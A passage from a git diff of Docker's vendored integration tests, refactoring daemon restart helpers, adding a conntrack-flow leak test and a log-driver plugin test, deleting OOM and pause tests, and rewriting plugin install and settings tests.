c.Assert(err, checker.IsNil) + hosts2 := 
readContainerFileWithExec(c, cid2, hostsFile) // verify first container etc/hosts file has not changed - hosts1post, err := readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts1post := readContainerFileWithExec(c, cid1, hostsFile) c.Assert(string(hosts1), checker.Equals, string(hosts1post), check.Commentf("Unexpected %s change on anonymous container creation", hostsFile)) @@ -887,11 +894,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { dockerCmd(c, "network", "connect", cstmBridgeNw1, cid2) - hosts2, err = readContainerFileWithExec(cid2, hostsFile) - c.Assert(err, checker.IsNil) - - hosts1post, err = readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts2 = readContainerFileWithExec(c, cid2, hostsFile) + hosts1post = readContainerFileWithExec(c, cid1, hostsFile) c.Assert(string(hosts1), checker.Equals, string(hosts1post), check.Commentf("Unexpected %s change on container connect", hostsFile)) @@ -906,18 +910,16 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { // Stop named container and verify first two containers' etc/hosts file hasn't changed dockerCmd(c, "stop", cid3) - hosts1post, err = readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts1post = readContainerFileWithExec(c, cid1, hostsFile) c.Assert(string(hosts1), checker.Equals, string(hosts1post), check.Commentf("Unexpected %s change on name container creation", hostsFile)) - hosts2post, err := readContainerFileWithExec(cid2, hostsFile) - c.Assert(err, checker.IsNil) + hosts2post := readContainerFileWithExec(c, cid2, hostsFile) c.Assert(string(hosts2), checker.Equals, string(hosts2post), check.Commentf("Unexpected %s change on name container creation", hostsFile)) // verify that container 1 and 2 can't ping the named container now - _, _, err = dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName) + _, _, err := dockerCmdWithError("exec", cid1, "ping", 
"-c", "1", cName) c.Assert(err, check.NotNil) _, _, err = dockerCmdWithError("exec", cid2, "ping", "-c", "1", cName) c.Assert(err, check.NotNil) @@ -950,6 +952,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkLinkOnDefaultNetworkOnly(c *check. } func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) { + testRequires(c, SameHostDaemon) // Verify exposed ports are present in ps output when running a container on // a network managed by a driver which does not provide the default gateway // for the container @@ -976,7 +979,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C) { - testRequires(c, DaemonIsLinux, NotUserNamespace) + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) dnd := "dnd" did := "did" @@ -984,7 +987,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C server := httptest.NewServer(mux) setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did) - s.d.StartWithBusybox() + s.d.StartWithBusybox(c) _, err := s.d.Cmd("network", "create", "-d", dnd, "--subnet", "1.1.1.0/24", "net1") c.Assert(err, checker.IsNil) @@ -992,16 +995,12 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C c.Assert(err, checker.IsNil) // Kill daemon and restart - if err = s.d.cmd.Process.Kill(); err != nil { - c.Fatal(err) - } + c.Assert(s.d.Kill(), checker.IsNil) server.Close() startTime := time.Now().Unix() - if err = s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) lapse := time.Now().Unix() - startTime if lapse > 60 { // In normal scenarios, daemon restart takes ~1 second. 
@@ -1021,6 +1020,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C } func (s *DockerNetworkSuite) TestDockerNetworkMacInspect(c *check.C) { + testRequires(c, SameHostDaemon) // Verify endpoint MAC address is correctly populated in container's network settings nwn := "ov" ctn := "bb" @@ -1062,7 +1062,7 @@ func (s *DockerSuite) TestInspectAPIMultipleNetworks(c *check.C) { c.Assert(bridge.IPAddress, checker.Equals, inspect121.NetworkSettings.IPAddress) } -func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []string) { +func connectContainerToNetworks(c *check.C, d *daemon.Daemon, cName string, nws []string) { // Run a container on the default network out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -1076,7 +1076,7 @@ func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []strin } } -func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, nws []string) { +func verifyContainerIsConnectedToNetworks(c *check.C, d *daemon.Daemon, cName string, nws []string) { // Verify container is connected to all the networks for _, nw := range nws { out, err := d.Cmd("inspect", "-f", fmt.Sprintf("{{.NetworkSettings.Networks.%s}}", nw), cName) @@ -1086,16 +1086,17 @@ func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, n } func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRestart(c *check.C) { + testRequires(c, SameHostDaemon) cName := "bb" nwList := []string{"nw1", "nw2", "nw3"} - s.d.StartWithBusybox() + s.d.StartWithBusybox(c) connectContainerToNetworks(c, s.d, cName, nwList) verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) // Reload daemon - s.d.Restart() + s.d.Restart(c) _, err := s.d.Cmd("start", cName) c.Assert(err, checker.IsNil) @@ -1104,19 +1105,18 @@ func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRest } func (s 
*DockerNetworkSuite) TestDockerNetworkMultipleNetworksUngracefulDaemonRestart(c *check.C) { + testRequires(c, SameHostDaemon) cName := "cc" nwList := []string{"nw1", "nw2", "nw3"} - s.d.StartWithBusybox() + s.d.StartWithBusybox(c) connectContainerToNetworks(c, s.d, cName, nwList) verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) // Kill daemon and restart - if err := s.d.cmd.Process.Kill(); err != nil { - c.Fatal(err) - } - s.d.Restart() + c.Assert(s.d.Kill(), checker.IsNil) + s.d.Restart(c) // Restart container _, err := s.d.Cmd("start", cName) @@ -1132,8 +1132,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkRunNetByID(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c *check.C) { - testRequires(c, DaemonIsLinux, NotUserNamespace) - s.d.StartWithBusybox() + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) + s.d.StartWithBusybox(c) // Run a few containers on host network for i := 0; i < 10; i++ { @@ -1141,22 +1141,18 @@ func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c out, err := s.d.Cmd("run", "-d", "--name", cName, "--net=host", "--restart=always", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - // verfiy container has finished starting before killing daemon - err = s.d.waitRun(cName) + // verify container has finished starting before killing daemon + err = s.d.WaitRun(cName) c.Assert(err, checker.IsNil) } // Kill daemon ungracefully and restart - if err := s.d.cmd.Process.Kill(); err != nil { - c.Fatal(err) - } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + c.Assert(s.d.Kill(), checker.IsNil) + s.d.Restart(c) // make sure all the containers are up and running for i := 0; i < 10; i++ { - err := s.d.waitRun(fmt.Sprintf("hostc-%d", i)) + err := s.d.WaitRun(fmt.Sprintf("hostc-%d", i)) c.Assert(err, checker.IsNil) } } @@ -1262,6 +1258,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkRestartWithMultipleNetworks(c *che } func (s 
*DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContainer(c *check.C) { + testRequires(c, SameHostDaemon) dockerCmd(c, "network", "create", "test") dockerCmd(c, "create", "--name=foo", "busybox", "top") dockerCmd(c, "network", "connect", "test", "foo") @@ -1269,7 +1266,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContaine c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) // Restart docker daemon to test the config has persisted to disk - s.d.Restart() + s.d.Restart(c) networks = inspectField(c, "foo", "NetworkSettings.Networks") c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) @@ -1288,7 +1285,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContaine c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) // Restart docker daemon to test the config has persisted to disk - s.d.Restart() + s.d.Restart(c) networks = inspectField(c, "foo", "NetworkSettings.Networks") c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) @@ -1419,7 +1416,7 @@ func verifyIPAddresses(c *check.C, cName, nwname, ipv4, ipv6 string) { func (s *DockerNetworkSuite) TestDockerNetworkConnectLinkLocalIP(c *check.C) { // create one test network - dockerCmd(c, "network", "create", "n0") + dockerCmd(c, "network", "create", "--ipv6", "--subnet=2001:db8:1234::/64", "n0") assertNwIsAvailable(c, "n0") // run a container with incorrect link-local address @@ -1543,10 +1540,10 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) { dockerCmd(c, "network", "create", "-d", "bridge", "net1") dockerCmd(c, "network", "create", "-d", "bridge", "net2") - cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox", "top") + cid, _ := dockerCmd(c, "run", "-d", "--net=net1", 
"--name=first", "--net-alias=foo", "busybox:glibc", "top") c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox:glibc", "top") c.Assert(waitRun("second"), check.IsNil) // ping first container and its alias @@ -1583,7 +1580,7 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) { c.Assert(err, check.IsNil) // verify the alias option is rejected when running on predefined network - out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox", "top") + out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox:glibc", "top") c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) @@ -1597,10 +1594,10 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectivity(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace) dockerCmd(c, "network", "create", "-d", "bridge", "br.net1") - dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox:glibc", "top") c.Assert(waitRun("c1.net1"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox:glibc", "top") c.Assert(waitRun("c2.net1"), check.IsNil) // ping first container by its unqualified name @@ -1627,6 +1624,7 @@ func (s *DockerSuite) TestEmbeddedDNSInvalidInput(c *check.C) { func (s *DockerSuite) TestDockerNetworkConnectFailsNoInspectChange(c *check.C) { dockerCmd(c, "run", "-d", "--name=bb", "busybox", "top") c.Assert(waitRun("bb"), check.IsNil) + defer dockerCmd(c, "stop", "bb") ns0 := inspectField(c, "bb", "NetworkSettings.Networks.bridge") @@ -1644,9 +1642,9 @@ func (s *DockerSuite) 
TestDockerNetworkInternalMode(c *check.C) { nr := getNetworkResource(c, "internal") c.Assert(nr.Internal, checker.True) - dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox:glibc", "top") c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox:glibc", "top") c.Assert(waitRun("second"), check.IsNil) out, _, err := dockerCmdWithError("exec", "first", "ping", "-W", "4", "-c", "1", "www.google.com") c.Assert(err, check.NotNil) @@ -1670,10 +1668,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkCreateDeleteSpecialCharacters(c *c func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) { testRequires(t, DaemonIsLinux) - if err := s.d.StartWithBusybox("--live-restore"); err != nil { - t.Fatal(err) - } - defer s.d.Stop() + s.d.StartWithBusybox(t, "--live-restore") + defer s.d.Stop(t) oldCon := "old" _, err := s.d.Cmd("run", "-d", "--name", oldCon, "-p", "80:80", "busybox", "top") @@ -1690,9 +1686,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) { } // restart the daemon - if err := s.d.Start("--live-restore"); err != nil { - t.Fatal(err) - } + s.d.Start(t, "--live-restore") // start a new container, the new container's ip should not be the same with // old running container. 
@@ -1789,3 +1783,53 @@ func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromBridge(c *check.C) { _, _, err := dockerCmdWithError("network", "disconnect", network, name) c.Assert(err, check.IsNil) } + +// TestConntrackFlowsLeak covers the failure scenario of ticket: https://github.com/docker/docker/issues/8795 +// Validates that conntrack is correctly cleaned once a container is destroyed +func (s *DockerNetworkSuite) TestConntrackFlowsLeak(c *check.C) { + testRequires(c, IsAmd64, DaemonIsLinux, Network, SameHostDaemon) + + // Create a new network + cli.DockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind") + assertNwIsAvailable(c, "testbind") + + // Launch the server, this will remain listening on an exposed port and reply to any request in a ping/pong fashion + cmd := "while true; do echo hello | nc -w 1 -lu 8080; done" + cli.DockerCmd(c, "run", "-d", "--name", "server", "--net", "testbind", "-p", "8080:8080/udp", "appropriate/nc", "sh", "-c", cmd) + + // Launch a container client, here the objective is to create a flow that is natted in order to expose the bug + cmd = "echo world | nc -q 1 -u 192.168.10.1 8080" + cli.DockerCmd(c, "run", "-d", "--name", "client", "--net=host", "appropriate/nc", "sh", "-c", cmd) + + // Get all the flows using netlink + flows, err := netlink.ConntrackTableList(netlink.ConntrackTable, unix.AF_INET) + c.Assert(err, check.IsNil) + var flowMatch int + for _, flow := range flows { + // count only the flows that we are interested in, skipping others that can be laying around the host + if flow.Forward.Protocol == unix.IPPROTO_UDP && + flow.Forward.DstIP.Equal(net.ParseIP("192.168.10.1")) && + flow.Forward.DstPort == 8080 { + flowMatch++ + } + } + // The client should have created only 1 flow + c.Assert(flowMatch, checker.Equals, 1) + + // Now delete the server, this will trigger the conntrack cleanup + cli.DockerCmd(c, 
"rm", "-fv", "server") + + // Fetch again all the flows and validate that there is no server flow in the conntrack laying around + flows, err = netlink.ConntrackTableList(netlink.ConntrackTable, unix.AF_INET) + c.Assert(err, check.IsNil) + flowMatch = 0 + for _, flow := range flows { + if flow.Forward.Protocol == unix.IPPROTO_UDP && + flow.Forward.DstIP.Equal(net.ParseIP("192.168.10.1")) && + flow.Forward.DstPort == 8080 { + flowMatch++ + } + } + // All the flows have to be gone + c.Assert(flowMatch, checker.Equals, 0) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go deleted file mode 100644 index bcf59f8601..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go +++ /dev/null @@ -1,30 +0,0 @@ -// +build !windows - -package main - -import ( - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestInspectOomKilledTrue(c *check.C) { - testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) - - name := "testoomkilled" - _, exitCode, _ := dockerCmdWithError("run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") - - c.Assert(exitCode, checker.Equals, 137, check.Commentf("OOM exit should be 137")) - - oomKilled := inspectField(c, name, "State.OOMKilled") - c.Assert(oomKilled, checker.Equals, "true") -} - -func (s *DockerSuite) TestInspectOomKilledFalse(c *check.C) { - testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) - - name := "testoomkilled" - dockerCmd(c, "run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "echo hello world") - - oomKilled := inspectField(c, name, "State.OOMKilled") - c.Assert(oomKilled, checker.Equals, "false") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go deleted file mode 100644 index 9217a69968..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go +++ /dev/null @@ -1,66 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestPause(c *check.C) { - testRequires(c, IsPausable) - defer unpauseAllContainers() - - name := "testeventpause" - runSleepingContainer(c, "-d", "--name", name) - - dockerCmd(c, "pause", name) - pausedContainers, err := getSliceOfPausedContainers() - c.Assert(err, checker.IsNil) - c.Assert(len(pausedContainers), checker.Equals, 1) - - dockerCmd(c, "unpause", name) - - out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) - events := strings.Split(strings.TrimSpace(out), "\n") - actions := eventActionsByIDAndType(c, events, name, "container") - - c.Assert(actions[len(actions)-2], checker.Equals, "pause") - c.Assert(actions[len(actions)-1], checker.Equals, "unpause") -} - -func (s *DockerSuite) TestPauseMultipleContainers(c *check.C) { - testRequires(c, IsPausable) - defer unpauseAllContainers() - - containers := []string{ - "testpausewithmorecontainers1", - "testpausewithmorecontainers2", - } - for _, name := range containers { - runSleepingContainer(c, "-d", "--name", name) - } - dockerCmd(c, append([]string{"pause"}, containers...)...) - pausedContainers, err := getSliceOfPausedContainers() - c.Assert(err, checker.IsNil) - c.Assert(len(pausedContainers), checker.Equals, len(containers)) - - dockerCmd(c, append([]string{"unpause"}, containers...)...) 
- - out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) - events := strings.Split(strings.TrimSpace(out), "\n") - - for _, name := range containers { - actions := eventActionsByIDAndType(c, events, name, "container") - - c.Assert(actions[len(actions)-2], checker.Equals, "pause") - c.Assert(actions[len(actions)-1], checker.Equals, "unpause") - } -} - -func (s *DockerSuite) TestPauseFailsOnWindowsServerContainers(c *check.C) { - testRequires(c, DaemonIsWindows, NotPausable) - runSleepingContainer(c, "-d", "--name=test") - out, _, _ := dockerCmdWithError("pause", "test") - c.Assert(out, checker.Contains, "cannot pause Windows Server Containers") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go new file mode 100644 index 0000000000..7d1ffcb632 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go @@ -0,0 +1,48 @@ +package main + +import ( + "context" + "strings" + + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPluginLogDriver(c *check.C) { + testRequires(c, IsAmd64, DaemonIsLinux) + + pluginName := "cpuguy83/docker-logdriver-test:latest" + + dockerCmd(c, "plugin", "install", pluginName) + dockerCmd(c, "run", "--log-driver", pluginName, "--name=test", "busybox", "echo", "hello") + out, _ := dockerCmd(c, "logs", "test") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + + dockerCmd(c, "start", "-a", "test") + out, _ = dockerCmd(c, "logs", "test") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nhello") + + dockerCmd(c, "rm", "test") + dockerCmd(c, "plugin", "disable", pluginName) + dockerCmd(c, "plugin", "rm", pluginName) +} + +// Make sure log drivers are listed in info, and v2 plugins are not. 
+func (s *DockerSuite) TestPluginLogDriverInfoList(c *check.C) { + testRequires(c, IsAmd64, DaemonIsLinux) + pluginName := "cpuguy83/docker-logdriver-test" + + dockerCmd(c, "plugin", "install", pluginName) + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + info, err := cli.Info(context.Background()) + c.Assert(err, checker.IsNil) + + drivers := strings.Join(info.Plugins.Log, " ") + c.Assert(drivers, checker.Contains, "json-file") + c.Assert(drivers, checker.Not(checker.Contains), pluginName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go index 380357d303..391c74aa5d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go @@ -1,16 +1,22 @@ package main import ( + "context" "fmt" - "os/exec" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" - "io/ioutil" + "net/http" "os" + "path" "path/filepath" "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/go-check/check" ) var ( @@ -22,40 +28,40 @@ var ( npNameWithTag = npName + ":" + pTag ) -func (s *DockerSuite) TestPluginBasicOps(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) +func (ps *DockerPluginSuite) TestPluginBasicOps(c *check.C) { + plugin := ps.getPluginRepoWithTag() + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", plugin) c.Assert(err, checker.IsNil) out, _, err := dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - 
c.Assert(out, checker.Contains, pName) - c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, plugin) c.Assert(out, checker.Contains, "true") - id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", plugin) id = strings.TrimSpace(id) c.Assert(err, checker.IsNil) - out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + out, _, err = dockerCmdWithError("plugin", "remove", plugin) c.Assert(err, checker.NotNil) c.Assert(out, checker.Contains, "is enabled") - _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + _, _, err = dockerCmdWithError("plugin", "disable", plugin) c.Assert(err, checker.IsNil) - out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + out, _, err = dockerCmdWithError("plugin", "remove", plugin) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, pNameWithTag) + c.Assert(out, checker.Contains, plugin) - _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id)) + _, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id)) if !os.IsNotExist(err) { c.Fatal(err) } } -func (s *DockerSuite) TestPluginForceRemove(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginForceRemove(c *check.C) { + pNameWithTag := ps.getPluginRepoWithTag() + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) c.Assert(err, checker.IsNil) @@ -69,6 +75,7 @@ func (s *DockerSuite) TestPluginForceRemove(c *check.C) { func (s *DockerSuite) TestPluginActive(c *check.C) { testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) c.Assert(err, checker.IsNil) @@ -116,8 +123,9 @@ func (s *DockerSuite) TestPluginActiveNetwork(c *check.C) { c.Assert(out, checker.Contains, npNameWithTag) } -func (s *DockerSuite) 
TestPluginInstallDisable(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginInstallDisable(c *check.C) { + pName := ps.getPluginRepoWithTag() + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Contains, pName) @@ -148,22 +156,66 @@ func (s *DockerSuite) TestPluginInstallDisableVolumeLs(c *check.C) { dockerCmd(c, "volume", "ls") } -func (s *DockerSuite) TestPluginSet(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName) - c.Assert(strings.TrimSpace(out), checker.Contains, pName) - - env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) +func (ps *DockerPluginSuite) TestPluginSet(c *check.C) { + client := testEnv.APIClient() + + name := "test" + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + initialValue := "0" + mntSrc := "foo" + devPath := "/dev/bar" + + // Create a new plugin with extra settings + err := plugin.Create(ctx, client, name, func(cfg *plugin.Config) { + cfg.Env = []types.PluginEnv{{Name: "DEBUG", Value: &initialValue, Settable: []string{"value"}}} + cfg.Mounts = []types.PluginMount{ + {Name: "pmount1", Settable: []string{"source"}, Type: "none", Source: &mntSrc}, + {Name: "pmount2", Settable: []string{"source"}, Type: "none"}, // Mount without source is invalid. + } + cfg.Linux.Devices = []types.PluginDevice{ + {Name: "pdev1", Path: &devPath, Settable: []string{"path"}}, + {Name: "pdev2", Settable: []string{"path"}}, // Device without Path is invalid. 
+ } + }) + c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin")) + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", name) c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]") - dockerCmd(c, "plugin", "set", pName, "DEBUG=1") + dockerCmd(c, "plugin", "set", name, "DEBUG=1") - env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", name) c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}", name) + c.Assert(strings.TrimSpace(env), checker.Contains, mntSrc) + + dockerCmd(c, "plugin", "set", name, "pmount1.source=bar") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}", name) + c.Assert(strings.TrimSpace(env), checker.Contains, "bar") + + out, _, err := dockerCmdWithError("plugin", "set", name, "pmount2.source=bar2") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Plugin config has no mount source") + + out, _, err = dockerCmdWithError("plugin", "set", name, "pdev2.path=/dev/bar2") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Plugin config has no device path") + } -func (s *DockerSuite) TestPluginInstallArgs(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginInstallArgs(c *check.C) { + pName := path.Join(ps.registryHost(), "plugin", "testplugininstallwithargs") + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + plugin.CreateInRegistry(ctx, pName, nil, func(cfg *plugin.Config) { + cfg.Env = []types.PluginEnv{{Name: "DEBUG", Settable: []string{"value"}}} + }) + out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName, "DEBUG=1") 
c.Assert(strings.TrimSpace(out), checker.Contains, pName) @@ -171,8 +223,8 @@ func (s *DockerSuite) TestPluginInstallArgs(c *check.C) { c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") } -func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64) +func (ps *DockerPluginSuite) TestPluginInstallImage(c *check.C) { + testRequires(c, IsAmd64) repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) // tag the image to upload it to the private registry @@ -182,11 +234,12 @@ func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) { out, _, err := dockerCmdWithError("plugin", "install", repoName) c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "target is image") + c.Assert(out, checker.Contains, `Encountered remote "application/vnd.docker.container.image.v1+json"(image) when fetching`) } -func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginEnableDisableNegative(c *check.C) { + pName := ps.getPluginRepoWithTag() + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pName) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Contains, pName) @@ -206,9 +259,7 @@ func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) { c.Assert(err, checker.IsNil) } -func (s *DockerSuite) TestPluginCreate(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - +func (ps *DockerPluginSuite) TestPluginCreate(c *check.C) { name := "foo/bar-driver" temp, err := ioutil.TempDir("", "foo") c.Assert(err, checker.IsNil) @@ -240,15 +291,15 @@ func (s *DockerSuite) TestPluginCreate(c *check.C) { c.Assert(len(strings.Split(strings.TrimSpace(out), "\n")), checker.Equals, 2) } -func (s *DockerSuite) TestPluginInspect(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginInspect(c 
